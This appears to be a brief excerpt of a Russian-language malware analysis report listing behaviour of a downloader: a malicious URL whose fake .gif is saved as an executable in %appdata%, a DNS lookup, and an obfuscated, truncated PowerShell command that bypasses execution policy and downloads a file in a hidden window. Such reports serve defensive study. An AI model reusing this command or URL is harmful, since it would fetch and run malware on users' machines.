Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWErSHElL.ExE -^eXEcU^TIoNpOLi^Cy ^B^yp^as^s^ ^-no^Pr^OfiLE -^wInDOw^st^YL^e h^IdDEN ^(N^ew^-O^b^JEc^t s^y^s^T^em.NeT.wEb^C^li^ENT)^.^d^OwNL^O^Ad^fiL^E('http://www.zone...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "POWErSHElL.ExE -^eXEcU^TIoNpOLi^Cy ^B^yp^as^s^ ^-no^Pr^OfiLE -^wInDOw^st^YL^e h^IdDEN ^(N^ew^-O^b^JEc^t s^y^s^T^em.NeT.wEb^C^li^ENT)^.^d^OwNL^O^Ad^fiL^E('http://www.zone...' (со скрытым окном)